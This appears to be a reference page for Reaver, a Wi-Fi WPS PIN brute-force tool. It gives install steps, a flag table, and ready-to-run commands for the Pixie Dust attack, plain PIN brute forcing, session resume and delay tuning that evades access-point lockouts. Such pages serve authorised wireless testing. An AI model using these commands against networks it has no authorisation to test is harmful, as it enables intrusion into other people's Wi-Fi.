Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Reaver attacks WPS by brute forcing the 8-digit PIN. The PIN is verified in two 4-digit halves, reducing the keyspace to ~11,000 combinations. Also supports Pixie Dust for offline PIN recovery on vulnerable chipsets.

Install

sudo apt install reaver

Usage

reaver -i <interface> -b <BSSID> [options]
FlagDescription
-i <iface>Monitor mode interface
-b <BSSID>Target AP MAC address
-c <channel>Target channel
-K 1Enable Pixie Dust attack
-SResume saved session
-v / -vvVerbose / extra verbose
-d <sec>Delay between PIN attempts
--lock-delay <sec>Wait after lockout detected
--fail-wait <sec>Wait after consecutive failures
-p <PIN>Try specific PIN
-NDon’t send NACK packets
-LIgnore AP lockouts

Pixie Dust Attack

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv
Exploits weak nonce generation. Recovers PIN offline in seconds on vulnerable chipsets.

PIN Brute Force

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv

Resume Session

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S
Session state saved in /etc/reaver/<BSSID>.wpc.

Tune for Rate Limiting

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360